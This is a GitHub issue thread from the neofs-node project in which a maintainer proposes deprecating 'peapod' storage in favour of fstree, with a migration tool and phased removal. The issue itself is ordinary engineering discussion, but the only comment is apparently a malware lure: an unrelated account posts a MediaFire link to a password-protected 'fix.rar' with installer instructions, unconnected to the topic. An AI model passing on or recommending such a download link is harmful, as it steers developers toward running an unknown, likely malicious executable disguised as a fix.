### ISSUE TITLE
Deprecate peapod, provide migration to fstree

### ISSUE THREAD

**Issue by roman-khimov** [nspcc-dev/neofs-node#2924]
## Is your feature request related to a problem? Please describe.
I'm always frustrated when we keep code we no longer need. After #2814 peapods can be considered obsolete since fstree has better performance in all cases (and can be tweaked in many ways). We also:
 * have #2813 that is peapod-specific
 * have #1951 that peapods are susceptible to
 * have #2107 that is not peapod-specific, but likely can be handled much easier without yet another BoltDB on the disk
 * have #2497 where we can finally eliminate the concept of substorages, one shard --- one blobstor is much easier to handle (not within the scope of current issue, but in future, see #2480 also)

## Describe the solution you'd like
The proposal is to discontinue them in the same way we did for bbcz:
 * declare them as deprecated and to be removed
 * create a migration tool that moves data and fixes configuration file
 * roll it all out, keep peapods supported for one release, migrate
 * drop support for peapods in subsequent releases

## Describe alternatives you've considered
Keeping peapods, but why?

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
